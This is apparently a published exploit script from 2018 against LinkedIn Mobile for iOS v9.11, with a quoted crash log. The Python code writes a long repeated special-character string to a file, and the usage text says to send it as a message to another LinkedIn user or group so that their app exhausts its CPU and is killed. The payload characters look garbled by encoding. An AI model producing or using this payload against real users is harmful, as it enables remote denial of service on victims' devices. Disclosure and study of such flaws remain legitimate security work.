#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team -
http://www.kpn.com
# Linkedin Mobile iOS - v9.11 < CPU Resource exhaustion
#
# Found this and more exploits at my open source security project:
http://www.exploitpack.com
# Date and time of release: 2 August 2018
#
# How to use:
# Run the script and copy the content of the file, send it as a
message to another Linkedin user.
#
# Description:
# Linkedin Mobile iOS v9.11 and prior are affected. The application fails to
# properly filter user-supplied input and its prone to a remote cpu exhaustion.
# This exploits use the same bug discovered for WhatsApp:
https://www.exploit-db.com/exploits/43107/
#
# OS Version: iPhone OS 11.4.1 (Build 15G77)
# Architecture: arm64
# Report Version: 19
# Hardware model: iPhone7,1
# Action taken: Process killed
# CPU: 48s seconds cpu time over 62 seconds ( 93% cpu average ),
exceeding limit of 80% cpu over 60 seconds.
# Active cpus: 2
# 49 ??? (libdyld.dylib + 4032) [0x182e0dfc0]
# 49 ??? (LinkedIn + 213856) [0x100c04360]
# 49 ??? (UIKit + 3266392) [0x18d39c758]
# 49 ??? (GraphicsServices + 45088) [0x185362020]
# 49 ??? (CoreFoundation + 48552) [0x18337cda8]
import sys
reload(sys)
def linkedin(filename):
sys.setdefaultencoding("utf-8")
payload = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O' Ou OP O* O, O1 Oo U U U U U U' * 158
sutf8 = payload.encode('UTF-8')
print "[*] Writing to file: " + filename
open(filename, 'w').write(payload)
print "[*] Done."
def howtouse():
print "Usage: linkedin.py [FILENAME]"
print "[*] Mandatory arguments:"
print "[!] FILENAME"
sys.exit(-1)
if __name__ == "__main__":
try:
print "[*] Linkedin iOS 9.11.8592.4 iOS - CPU Resource
exhaustion by Juan Sacco"
print "[*] How to use: Copy the content of the file and send
it as a message to another linkedin user or group"
linkedin(sys.argv[1])
except IndexError:
howtouse()